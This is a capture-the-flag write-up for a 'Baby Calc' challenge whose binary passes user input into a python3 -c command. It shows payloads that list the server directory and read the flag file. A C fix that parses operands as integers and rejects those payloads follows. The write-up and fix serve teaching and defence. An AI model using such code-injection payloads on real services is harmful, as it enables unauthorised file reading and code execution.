Baby Calc
Category: pwn
50 points
We put addition in the cloud!
nc ctf2021.hackpack.club 11001
Hint: Try debugging.
File: chal
Solution
The chall file looks like an ordinary binary ;-)
file chall
chall: ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=e5bdadade029e7e030196070fb434cf2d92bbbad, for GNU/Linux 3.2.0, with debug_info, not stripped
But after a few executions I realized that it apparently calls Python to perform the calculations.
./chall
Welcome to CloudAdd! The fastest* adder on the planet, now in cloud!
*this is not a legally binding statement
Variable one: 1
Variable two: 2
3
./chall
Welcome to CloudAdd! The fastest* adder on the planet, now in cloud!
*this is not a legally binding statement
Variable one: dsadas
Variable two: 4343
Traceback (most recent call last):
  File "<string>", line 1, in <module>
NameError: name 'dsadas' is not defined
Even without debugging or decompiling, the cause became obvious: the binary embeds the Python command line into which both inputs are substituted.
strings chall | grep python
python3 -c 'print(%s + %s)'
Let’s exploit it :-) First I passed an empty string as the first argument and "".join(__import__("os").listdir()) as the second one, just to check where the flag is.
nc ctf2021.hackpack.club 11001
Welcome to CloudAdd! The fastest* adder on the planet, now in cloud!
*this is not a legally binding statement
Variable one: ""
Variable two: "".join(__import__("os").listdir())
flagchal
OK, let’s read the flag content by passing the open("flag","rt").read() payload as the second argument.
nc ctf2021.hackpack.club 11001
Welcome to CloudAdd! The fastest* adder on the planet, now in cloud!
*this is not a legally binding statement
Variable one: ""
Variable two: open("flag","rt").read()
flag{cL0uD_5Tr4tEgy}
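The fix for this class of bug, as an added example that is not the challenge's source: it assumes the binary formats both inputs into the python3 -c string found by strings, and replaces that with strict integer parsing and in-process addition. The names parse_operand and cloud_add are hypothetical.

```c
#include <errno.h>
#include <limits.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Hypothetical helper: accept only an optionally signed decimal integer, else -1. */
static int parse_operand(const char *text, long *out)
{
    char buf[32], *end = NULL;
    size_t len = strcspn(text, "\r\n");   /* drop the newline fgets() keeps */
    if (len == 0 || len >= sizeof buf)
        return -1;
    memcpy(buf, text, len);
    buf[len] = '\0';
    /* strtol() skips leading whitespace; insist on a sign or digit first. */
    if (buf[0] != '-' && buf[0] != '+' && (buf[0] < '0' || buf[0] > '9'))
        return -1;
    errno = 0;
    long v = strtol(buf, &end, 10);
    if (errno == ERANGE || end == buf || *end != '\0')
        return -1;                        /* out of range, no digits, or trailing text */
    *out = v;
    return 0;
}

/* Hypothetical replacement for the python3 -c call: 0 and the sum, or -1 on bad input/overflow. */
int cloud_add(const char *a, const char *b, long *sum)
{
    long x, y;
    if (parse_operand(a, &x) != 0 || parse_operand(b, &y) != 0)
        return -1;
    if ((y > 0 && x > LONG_MAX - y) || (y < 0 && x < LONG_MIN - y))
        return -1;
    *sum = x + y;
    return 0;
}

int main(void)
{
    /* Constructed inputs, copied from the sessions shown in this write-up. */
    const char *one[] = { "1", "dsadas", "\"\"" };
    const char *two[] = { "2", "4343", "open(\"flag\",\"rt\").read()" };
    for (int i = 0; i < 3; i++) {
        long s;
        if (cloud_add(one[i], two[i], &s) == 0) printf("%ld\n", s);
        else puts("rejected: operands must be integers");
    }
}
```

Because no interpreter or shell ever sees the input, nothing typed at the prompt can be evaluated as code; non-numeric operands are simply rejected.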
Flag
flag{cL0uD_5Tr4tEgy}